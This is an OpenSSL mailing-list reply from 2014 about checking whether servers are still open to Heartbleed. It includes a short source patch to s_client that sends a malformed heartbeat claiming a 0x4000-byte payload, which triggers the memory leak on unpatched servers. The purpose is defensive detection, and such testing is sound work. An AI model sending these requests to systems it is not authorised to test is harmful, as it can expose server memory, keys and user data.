On Wed, Apr 09, 2014 at 10:55:23AM -0400, Ted Byers wrote:
> I get the heartbeating message on both unpatched and patched servers.
> Should that make me worry about the patched machines?
No, unfortunately both patched and unpatched systems respond the
same way to valid heartbeat requests as send by s_client(1).
To detect a difference, you need to send invalid heartbeat requests
whose payload is shorter than promised. If you patch a copy of the
source code for OpenSSL 1.0.1 as below, and build statically linked
and run "./apps/openssl s_client ..." from the build tree:
--- a/ssl/t1_lib.c
+++ b/ssl/t1_lib.c
@@ -2702,7 +2702,7 @@ tls1_heartbeat(SSL *s)
/* Message Type */
*p++ = TLS1_HB_REQUEST;
/* Payload length (18 bytes here) */
- s2n(payload, p);
+ s2n(0x4000, p);
/* Sequence number */
s2n(s->tlsext_hb_seq, p);
/* 16 random bytes */
then you can detect the difference. Patched systems won't respond
to the malformed heartbeat request. Replace "echo B | ...." with something
like:
(sleep 10; echo B; sleep 10) | ...
to make sure that the handshake is complete by the time the request is sent,
and the client does not disconnect too quickly.
--
Viktor.
______________________________________________________________________
OpenSSL Project http://www.openssl.org
User Support Mailing List openssl-users@openssl.org
Automated List Manager majord...@openssl.org
